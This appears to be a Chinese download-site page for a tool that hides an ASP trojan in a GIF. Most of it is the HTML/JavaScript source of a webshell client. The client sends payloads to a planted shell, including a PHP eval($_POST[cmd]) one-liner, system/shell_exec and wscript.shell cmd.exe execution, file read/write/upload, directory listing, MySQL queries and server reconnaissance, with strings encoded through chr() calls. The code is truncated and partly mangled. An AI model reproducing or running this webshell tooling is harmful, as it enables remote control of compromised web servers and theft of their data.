将asp木马插入gif中调用工具.exe下载
资源介绍
<FORM name=frm method=post target=qq2>
木马地址: <INPUT size=60 value=http://127.0.0.1/up/nihao2.asp name=act id=act> 密码: <INPUT size=10 value=cmd name=para>生成器:<textarea rows='1' name='tmpcmd' cols='23'><?php eval($_POST[cmd];?></textarea></TD> |
|
<INPUT type=button value='提 交' name=Send><br>
"
break;
case "3":
yunxing[removed]="<p align='center'>执行函数:<select name='execfun'><option value='system' selected>system</option><option value='passthru'>passthru</option><option value='`'>特殊字符(`)</option><option value='shell_exec'>shell_exec</option><option value='exec'>exec</option><option value='popen'>popen</option></select><br><br><INPUT size=20 name=\\"cmdname\">
<INPUT type=button value='提 交' name=Send><br>
"
break;
case "4":
yunxing[removed]="文件路径(不填为当前目录)<br><input type=text name='uploaddir' value='C:/Inetpub/wwwroot/shell.asp' size=20><p align='center'><input NAME='LanKerF' TYPE='file' size=13><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;frm.action=document.all.act.value;upfile();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br>asp的不用点浏览,<br><br>直接提交<br>然后就可以上传了<br>asp的必须带文件名<br><br>"
break;
case "5":
yunxing[removed]="<p align='center'>文件名:<br><INPUT size=20 name=\\"duqu\">
<INPUT type=button value='提 交' name=Send><br>
"
break;
case "6":
yunxing[removed]="<p align='center'>目录名:<br><INPUT size=20 name=\\"duqu\">
<INPUT type=button value='提 交' name=Send><br>
"
break;
case "7":
yunxing[removed]="<p align='center'>文件1:<br><INPUT size=20 name=\\"file1\">
文件2:
<INPUT size=20 name=\"file2\"><br><INPUT type=button value='提 交' name=Send><br>
"
break;
case "8":
yunxing[removed]="<p align='center'>文件1:<br><INPUT size=20 name=\\"file1\">
文件2:
<INPUT size=20 name=\"file2\"><br><INPUT type=button value='提 交' name=Send><br>
"
break;
case "9":
yunxing[removed]="<p align='center'>文件名:<br><INPUT size=20 name=\\"filen\">
<INPUT type=button value='提 交' name=Send><br>
"
break;
case "10":
yunxing[removed]="<p align='center'><textarea rows='12' name='duqu' cols='22'>phpinfo();</textarea>"
yunxing[removed]+="<INPUT type=button value='提 交' name=Send><br>
字符转换工具:
要转换的字符:
<INPUT type=text name=\"inputstr\" size='23' ><br>转换后的字符:
<textarea cols='22' rows=\"4\" name=\"chrstr\" ></textarea>
<INPUT type=button name=strtxtdd value=\"转 换\" >" break; case "11": yunxing[removed]="主机:<input NAME=\\"servername\" TYPE=\"text\" value=\"localhost\" size=\"12\" >
数据库:<input NAME=\"dbname\" TYPE=\"text\" value size=\"10\" >
用户名:<input NAME=\"dbusername\" TYPE=\"text\" value=\"root\" size=\"10\" >
密码:<input NAME=\"dbpassword\" TYPE=\"text\" value size=\"12\" >
SQL语句:
<textarea rows=\"8\" name=\"sql\" cols=\"20\" ></textarea>" yunxing[removed]+="
<INPUT type=button value='提 交' name=Send>" break; case "12": yunxing[removed]="<p align='center'>文件名:<INPUT size=14 name=\\"filen\">
文件内容:
<textarea rows=\"16\" name=\"filec\" cols=\"20\" ></textarea>
<INPUT type=button value='提 交' name=Send>" break; case "13": yunxing[removed]="<p align='center'>文件名:<br><INPUT size=20 name=\\"filen\">
<INPUT type=button value='提 交' name=Send><br>" break; case "14": yunxing[removed]="<p align='center'>目录名:<br><INPUT size=20 name=\\"dir\">
<INPUT type=button value='提 交' name=Send><br>
" break; case "15": yunxing[removed]="<p align='center'>目录名:<br><INPUT size=20 name=\\"dir\">
<INPUT type=button value='提 交' name=Send><br>
" break; } } function cmd(){ if(getString()) { if (frm.execfun.value =='`'){ frm.tmpcmd.value="$cmd=" frm.tmpcmd.value+=duqu(frm.cmdname.value) frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="echo chr(60).chr(116).chr(101).chr(120).chr(116).chr(97).chr(114).chr(101).chr(97).chr(32).chr(99).chr(111).chr(108).chr(115).chr(61).chr(56).chr(48).chr(32).chr(114).chr(111).chr(119).chr(115).chr(61).chr(50).chr(54).chr(62);\n" frm.tmpcmd.value+="echo" frm.tmpcmd.value+=frm.execfun.value frm.tmpcmd.value+="$cmd" frm.tmpcmd.value+=frm.execfun.value frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="echo chr(60).chr(47).chr(116).chr(101).chr(120).chr(116).chr(97).chr(114).chr(101).chr(97).chr(62);\n" } else{ frm.tmpcmd.value="$cmd=" frm.tmpcmd.value+=duqu(frm.cmdname.value) frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="echo chr(60).chr(116).chr(101).chr(120).chr(116).chr(97).chr(114).chr(101).chr(97).chr(32).chr(99).chr(111).chr(108).chr(115).chr(61).chr(56).chr(48).chr(32).chr(114).chr(111).chr(119).chr(115).chr(61).chr(50).chr(54).chr(62);\n" frm.tmpcmd.value+="echo " frm.tmpcmd.value+=frm.execfun.value frm.tmpcmd.value+="($cmd);\n" frm.tmpcmd.value+="echo chr(60).chr(47).chr(116).chr(101).chr(120).chr(116).chr(97).chr(114).chr(101).chr(97).chr(62);\n" } } else { frm.tmpcmd.value="set objshell=server.createobject(\\\\\\\\"wscript.shell\")\n" frm.tmpcmd.value+="objshell.run(\"cmd.exe /c " frm.tmpcmd.value+=frm.cmdname.value frm.tmpcmd.value+=" > \"&Server;.MapPath(\".\")&\"\\25852.txt\")\n" frm.tmpcmd.value+="response.write \"<IFRAME height=340 width=580 src='25852.txt'></IFRAME>\"" } } function readfile(){ if(getString()) { frm.tmpcmd.value="$filename=" frm.tmpcmd.value+=duqu(frm.duqu.value) frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="$s=chr(60).chr(112).chr(114).chr(101).chr(62);\n" frm.tmpcmd.value+="$e=chr(60).chr(47).chr(112).chr(114).chr(101).chr(62);\n" frm.tmpcmd.value+="$fp=@fopen($filename,r);\n" frm.tmpcmd.value+="$contents=@fread($fp, filesize($filename));\n" 
frm.tmpcmd.value+="@fclose($fp);\n" frm.tmpcmd.value+="$contents=htmlspecialchars($contents);\n" frm.tmpcmd.value+="echo $s.$contents.$e;\n" } else { frm.tmpcmd.value="function streamReadFromFile(thePath)\\\\\\\\n" frm.tmpcmd.value+="dim stream\n" frm.tmpcmd.value+="set stream=server.createObject(\"adodb.stream\")\n" frm.tmpcmd.value+="with stream\n" frm.tmpcmd.value+=".type=2\n" frm.tmpcmd.value+=".mode=3\n" frm.tmpcmd.value+=".open\n" frm.tmpcmd.value+="on error resume next\n" frm.tmpcmd.value+=".loadFromFile thePath\n" frm.tmpcmd.value+="chkErr err,\"文件无法被打开,请重试!\"\n" frm.tmpcmd.value+=".charset=\"gb2312\"\n" frm.tmpcmd.value+="chkErr err,\"编码类型错误!\"\n" frm.tmpcmd.value+=".Position=2\n" frm.tmpcmd.value+="streamReadFromFile=.readText()\n" frm.tmpcmd.value+=".close\n" frm.tmpcmd.value+="end with\n" frm.tmpcmd.value+="set stream=nothing\n" frm.tmpcmd.value+="end function\n" frm.tmpcmd.value+="response.write \"<textarea name=fileContent cols=70 rows=25 id=fileContent>\"&server;.htmlEncode(streamReadFromFile(\"" frm.tmpcmd.value+=frm.duqu.value frm.tmpcmd.value+="\"))&\"</textarea>\"\n" } } function readdir(){ if(getString()) { frm.tmpcmd.value="$dir=" frm.tmpcmd.value+=duqu(frm.duqu.value) frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="$f = chr(60).chr(98).chr(114).chr(62);" frm.tmpcmd.value+="$dir=@dir($dir);" frm.tmpcmd.value+="if($dir) " frm.tmpcmd.value+="{" frm.tmpcmd.value+=" echo path_______.$dir->path.$f;" frm.tmpcmd.value+=" while($entry=$dir->read())" frm.tmpcmd.value+=" {" frm.tmpcmd.value+=" echo ____.$entry.$f; " frm.tmpcmd.value+=" }" frm.tmpcmd.value+=" $dir->close();" frm.tmpcmd.value+="}" frm.tmpcmd.value+="else" frm.tmpcmd.value+="{echo 0;}" } else { frm.tmpcmd.value="thePath=\\\\\\\\"" frm.tmpcmd.value+=frm.duqu.value frm.tmpcmd.value+="\"\ndim ext,flag,list,theHref,theFiles,fileName,theFolder,theFolders\n" frm.tmpcmd.value+="set fso=server.CreateObject(\"Scripting.filesystemobject\")\n" frm.tmpcmd.value+="set theFolder=fso.getFolder(thePath)\n" 
frm.tmpcmd.value+="set theFiles=theFolder.files\n" frm.tmpcmd.value+="set theFolders=theFolder.subFolders\n" frm.tmpcmd.value+="for each list in theFolders\n" frm.tmpcmd.value+="Response.Write list.path\n" frm.tmpcmd.value+="Response.Write \"\"\n" frm.tmpcmd.value+="next\n" frm.tmpcmd.value+="for each list in theFiles\n" frm.tmpcmd.value+="Response.Write list.path\n" frm.tmpcmd.value+="Response.Write \"\"\n" frm.tmpcmd.value+="next" } } function SQL(){ frm.tmpcmd.value="$message=chr(102).chr(97).chr(105).chr(108).chr(33);\\\\\\\\n" frm.tmpcmd.value+="$fgf=chr(32);\n" if(frm.dbpassword.value !=''){ frm.tmpcmd.value+="$dbpassword= " frm.tmpcmd.value+=duqu(frm.dbpassword.value) frm.tmpcmd.value+=";\n" } frm.tmpcmd.value+="$servername=" frm.tmpcmd.value+=duqu(frm.servername.value) frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="$dbusername=" frm.tmpcmd.value+=duqu(frm.dbusername.value) frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="$dbname=" frm.tmpcmd.value+=duqu(frm.dbname.value) frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="$sql=" frm.tmpcmd.value+=duqu(frm.sql.value) frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="@mysql_connect($servername,$dbusername,$dbpassword) or die($message);\n" frm.tmpcmd.value+="@mysql_select_db($dbname) or die($message);\n" frm.tmpcmd.value+="$sql=stripslashes($sql);\n" frm.tmpcmd.value+="$result = @mysql_query($sql);\n" frm.tmpcmd.value+="while($row=mysql_fetch_array($result,MYSQL_BOTH)){\n" frm.tmpcmd.value+="for($j=0;$j
服务器IP————\"&Request;.ServerVariables(\"LOCAL_ADDR\")\n" frm.tmpcmd.value+="response.write \"
服务器端口———\"&Request;.ServerVariables(\"SERVER_PORT\")\n" frm.tmpcmd.value+="response.write \"
服务器时间———\"&now;()\n" frm.tmpcmd.value+="response.write \"
本文件绝对路径—\"&server;.mappath(\".\")\n" frm.tmpcmd.value+="response.write \"
服务器CPU数量—-\"&Request;.ServerVariables(\"NUMBER_OF_PROCESSORS\")\n" frm.tmpcmd.value+="response.write \"
服务器操作系统—\"&Request;.ServerVariables(\"OS\")\n" } } [removed] [removed] function duqu(strcode){ var duqu=""; for(i=1;i